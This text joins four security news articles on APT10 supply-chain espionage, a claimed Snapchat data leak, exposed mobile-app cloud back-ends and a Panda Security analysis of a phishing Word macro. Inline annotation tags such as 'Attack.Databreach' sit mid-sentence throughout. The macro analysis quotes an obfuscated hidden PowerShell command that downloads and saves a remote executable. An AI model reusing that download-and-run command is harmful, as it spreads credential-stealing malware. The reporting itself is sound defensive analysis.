Advanced Persistent Threat group linked to China said to be attacking companies by targeting their suppliers - scale of operation said to be unprecedented . A Chinese hacking group is thought to be behind attacks on managed service providers as a way into their client companies , to facilitate the theft of intellectual property . The hacking group , called APT10 , used custom malware and spear-phishing attacks Attack.Phishing to gain access to victims ' systems . Once inside , they used the company 's credentials to attack their client companies . The security of the supply chain has been a recognised weakness in security systems since at least 2013 when it was discovered that attackers had gained access to the Target retail chain in America through an HVAC service provider . Now it appears that APT10 is using that approach on a large scale . The group was discovered by PwC 's cyber-security practice and BAE Systems , working alongside the UK 's National Cyber Security Centre ( NCSC ) . The scale of the espionage campaign only became apparent in late 2016 , but the attack is thought to be the largest sustained global cyber-espionage campaign ever seen . PwC and BAE Systems said APT10 conducted the espionage campaign by targeting providers of managed outsourced IT services as a way in to their customers ' organisations around the world , gaining unprecedented access Attack.Databreach to intellectual property and sensitive data . It is thought the group launched the campaign in 2014 and then significantly ramped it up in early 2016 , adding new developers and intrusion operators to continually enhance capability . The group is known to have exfiltrated Attack.Databreach a high volume of data from multiple victims and used compromised networks to stealthily move this data around the world . A number of Japanese organisations have also been targeted directly in a separate , simultaneous campaign by the same group , with APT10 masquerading as Attack.Phishing legitimate Japanese government entities to gain access . Forensic analysis of the timings of the attack , as well as tools and techniques used , led investigators to conclude that the group may be based in China , but apart from that , it is not known precisely who is behind APT10 or why it targets certain organisations . Kris McConkey , partner for cyber-threat detection and response at PwC , said that the indirect approach of this attack highlights the need for organisations to have a comprehensive view of the threats they 're exposed to – including those of their supply chain . “ This is a global campaign with the potential to affect a wide range of countries , so organisations around the world should work with their security teams and providers to check networks for the key warning signs of compromise and ensure they respond and protect themselves accordingly , ” he said . Richard Horne , cyber-security partner at PwC , added that “ operating alone , none of us would have joined the dots to uncover this new campaign of indirect attacks . “ Together we 've been working to brief the global security community , managed service providers and known end victims to help prevent , detect and respond to these attacks , ” he added . Ilia Kolochenko , CEO of High-Tech Bridge , told SC Media UK that until there is more detail on the attacks , it would not be possible to make a reliable conclusion as to who was behind the so-called APT10 . “ Taking into consideration how careless and negligent some managed IT providers are , I would n't be surprised if all the attacks were conducted by a group of teenagers – something we have already seen in the past , ” he said . “ IT services providers should better enumerate and assess their digital risks , and implement appropriate security controls to mitigate related threats and vulnerabilities . Security standards , like ISO 27001 , can significantly help assure that the risks are continuously identified and are being duly addressed . For cyber-security service providers , accreditation by CREST is also an important factor to demonstrate the necessary standard of care around security , confidentiality and integrity for their own and client data , ” he added . “ Companies looking to secure their supply-chain can oblige their suppliers to get certified by ISO 27001 for example , or to provide solid and unconditional insurance to cover any data breaches Attack.Databreach and data leaks Attack.Databreach , including direct and consequent damages . ''

One of the biggest and most popular social networking platforms , Snapchat , has once again become the center of attention . But this time , it is for all the wrong reasons with tweets and hashtags ( # Uninstall_Snapchat and # BoycottSnapchat ) urging people to get rid of the app . Apparently , the outrage started in India , after one of Snapchat ’ s former employees said that the CEO of the company had no intention to expand the business to India since the Snapchat platform is meant for “ rich people ” and not for “ poor countries ” like India and or Spain . Enraged India first reacted on Twitter , and after that , the hacktivist group Anonymous India claimed that they were responsible for 1.7 million Snapchat users ’ data leak Attack.Databreach . The hacking group has supposedly found Vulnerability-related.DiscoverVulnerability vulnerabilities in Snapchat ’ s systems and managed to steal Attack.Databreach 1.7 million user data and leaked Attack.Databreach them on the dark web . It seems that the hackers belong to one of the many bug bounty hunting groups that are finding Vulnerability-related.DiscoverVulnerability flaws in systems of big companies in exchange for money . It appears that the flaw in Snapchat ’ s security was discovered Vulnerability-related.DiscoverVulnerability last year , but never reported Vulnerability-related.DiscoverVulnerability to the authorities . Now , the same flaw was used to steal Snapchat users data , reports Vulnerability-related.DiscoverVulnerability DailyMail . The hackers are also demanding that the CEO apologize or an intensive strike against Snapchat will be launched . So far , Snapchat itself hasn ’ t confirmed any data leaks Attack.Databreach and we ’ re still waiting for an official comment from the social media giant . So far , the company has claimed that the allegations are ridiculous and that the app is available worldwide for everyone who wishes to use it . A spokesperson for the company has denied everything that Snapchat is being accused of . Despite this , the outrage on the social media continues , and many are still persuading others to boycott the application , or better yet – to completely uninstall it . The ratings of the company have dropped down fast , and the app is currently rated with only one star on the Apple ’ s App Store , while before this ‘ incident ’ it had a full five-star rating . And when it comes to Google Play Store , the app has a four-star rating at the time of writing . It ’ s unknown what will happen with the company now that their reputation has dropped down so dramatically , but whatever they decide to do to fix Vulnerability-related.PatchVulnerability this , they better do it fast .

Developers are once again being blamed Vulnerability-related.DiscoverVulnerability for cloud back-end security vulnerabilities , this time in a new report Vulnerability-related.DiscoverVulnerability from Appthority . The company published investigation results that found nearly 43 TB of enterprise data was exposed Attack.Databreach on cloud back-ends , including personally identifiable information ( PII ) . This comes just shortly after a similar report from a different security company . In the new `` 2017 Q2 Enterprise Mobile Threat Report '' report ( free upon providing registration info ) , Appthority found `` data leakage Attack.Databreach `` from mobile apps that send data to unsecured cloud back-ends . While security concerns typically focus on a triad of other factors -- apps , device threats and network threats -- this data leakage Attack.Databreach on the back-end was dubbed the `` HospitalGown '' threat because of that garment 's open back-end . `` In total , we found Vulnerability-related.DiscoverVulnerability almost 43 TB of data exposed Attack.Databreach and 1,000 apps affected Vulnerability-related.DiscoverVulnerability by the HospitalGown vulnerability , '' Appthority said Vulnerability-related.DiscoverVulnerability in a blog post last week . `` Looking at a subset of 39 apps , we still found 280 million records exposed Attack.Databreach , a total of about 163 GB of data . This is a staggering amount of leaked information , and in some cases represents the entirety of customer or operational data for an enterprise . '' The report Vulnerability-related.DiscoverVulnerability echoes the findings of an earlier report Vulnerability-related.DiscoverVulnerability by RedLock Inc. , which revealed Vulnerability-related.DiscoverVulnerability many security issues primarily caused by user misconfigurations on public cloud platforms . RedLock claimed it found 82 percent of hosted databases remain unencrypted , among many other problems . As with the RedLock report Vulnerability-related.DiscoverVulnerability , developers were blamed Vulnerability-related.DiscoverVulnerability for the HospitalGown vulnerabilities. `` HospitalGown is a vulnerability to data exposure caused , not by any code in the app , but by the app developers ' failure to properly secure the back-end ( hence its name ) servers with which the app communicates and where sensitive data is stored , '' Appthority said . Unsecured Elasticsearch servers and MongoDB databases were prime targets of a series of ransomware attacks Attack.Ransom earlier this year that generated widespread publicity in the security field . However , that publicity apparently was n't enough to significantly alleviate the issue . `` As our findings show , weakly secured back-ends in apps used by employees , partners and customers create a range of security risks including extensive data leaks Attack.Databreach of personally identifiable information ( PII ) and other sensitive data , '' the report states . `` They also significantly increase the risk of spear phishing Attack.Phishing , brute force login , social engineering , data ransom Attack.Ransom , and other attacks . And , HospitalGown makes data access Attack.Databreach and exfiltration Attack.Databreach far easier than other types of attacks . '' Key findings of the report as listed by the company include : Affected apps are connecting to unsecured data stores on popular enterprise services , such as Elasticsearch and MySQL , which are leaking Attack.Databreach large amounts of sensitive data . Apps using just one of these services revealed almost 43TB of exposed data . Multiple affected apps leaked Attack.Databreach some form of PII , including passwords , location , travel and payment details , corporate profile data ( including employees ' VPN PINs , emails , phone numbers ) , and retail customer data . Enterprise security teams do not have visibility into the risk due to the risk 's location in the mobile app vendor 's architecture stack . In multiple cases , data has already been accessed Attack.Databreach by unauthorized individuals and ransomed Attack.Ransom . Even apps that have been removed from devices and the app stores still pose an exposure Attack.Databreach risk due to the sensitive data that remains stored on unsecured servers . The company said Vulnerability-related.DiscoverVulnerability its Mobile Threat Team identified Vulnerability-related.DiscoverVulnerability the HospitalGown vulnerabilities with a combination of its dynamic app analysis tool and a new back-end scanning method , looking at the network traffic on more than 1 million enterprise mobile apps , both iOS and Android . As with the misconfiguration problems identified Vulnerability-related.DiscoverVulnerability in the RedLock report Vulnerability-related.DiscoverVulnerability , Appthority emphasized Vulnerability-related.DiscoverVulnerability that all cases of HospitalGown vulnerabilities were caused by human errors , not malicious intent or inherent infrastructure problems . That human error was especially prevalent in two app implementations investigated by Appthority : Pulse Workspace ( for accessing enterprise network and Web applications ) and Jacto apps ( from an agricultural machinery company ) .

Cyberthreats are a constant risk and affect public administrations significantly . So much so that they have become a powerful instrument of aggression against public entities and citizens . They can lead to a serious deterioration in the quality of service , and also , above all , to data leaks Attack.Databreach concerning everything from personal information to state secrets . The combination of new technologies and the increase in the complexity of attacks , as well as the professionalization of cybercriminals , is highly dangerous . Last December , a large-scale spam campaign spanning more than ten countries was carried out , and specifically targeted a major European ministry . The attack Attack.Phishing , via phishing Attack.Phishing , was highly advanced and combined social engineering tactics with a powerful Trojan . The attack Attack.Phishing is sent Attack.Phishing by email with an attached Word document . At first , we suspected that it was a targeted attack , since the message came , supposedly , from a healthcare company and the recipient was an employee of the Ministry of Health in a European country . The present analysis describes the technical features of the harmful code found in the macro of the Word document . The goal of the macro was to download and run another malicious component . Below are shown a few static properties of the analyzed files . The hash of the Word document is the following : MD5 : B480B7EFE5E822BD3C3C90D818502068 SHA1 : 861ae1beb98704f121e28e57b429972be0410930 According to the document ’ s metadata , the creation date was 2016-12-19 . The malicous code ’ s signature , downloaded by Word , is the following : MD5 : 3ea61e934c4fb7421087f10cacb14832 SHA1 : bffb40c2520e923c7174bbc52767b3b87f7364a9 The Word document gets to the victim ’ s computer by way of a spam email coming from Attack.Phishing a healthcare company . The text tricks Attack.Phishing the recipient into beleiving that the content is protected and needs to run the macro in order to gain access to it . According to the data recovered by Panda Security ’ s Collective Intelligence , this spam campaign took place on December 19 , 2016 and affected several countries . Interactions with the infected system The basic function of the macro consists in downloading and running another malicious code from a URL embedded in the macro itself . Also , the macro is designed to run immediately upon being opened . Part of the obfuscated code contained in the macro Once the macro is running , the Word doc runs the following command in the system : cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN ( NeW-oBjECt sYstEm.NeT.webcLiENt ) .DOWNloAdFILE ( ‘ http : //xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe ’ , ’ C : \Users\ ? ? ? ? \AppData\Roaming.eXe ’ The system symbol ( cmd.exe ) runs the powershell with two embedded commands going through parameters : Thanks to the data obtained by the Intelligence Collective at Panda Security , we know that the last malicious code to be distributed by this campaign is a variant of the Dyreza family . Panda ’ s clients were protected proactively , without need of signatures or updates . The purpose of the malicious code is to steal Attack.Databreach credentials from browsers and add the compromised machine to bot network . It then waits for commands from the Command & Control Server . These commands come from the cybercriminals that operate it , and is able to download further new malware and carry out all kinds of malicious actions . Digitization in Public Administration leads to the exponential growth of the creation , storage and management of huge quantities of confidential data — data that does not allow for a single oversight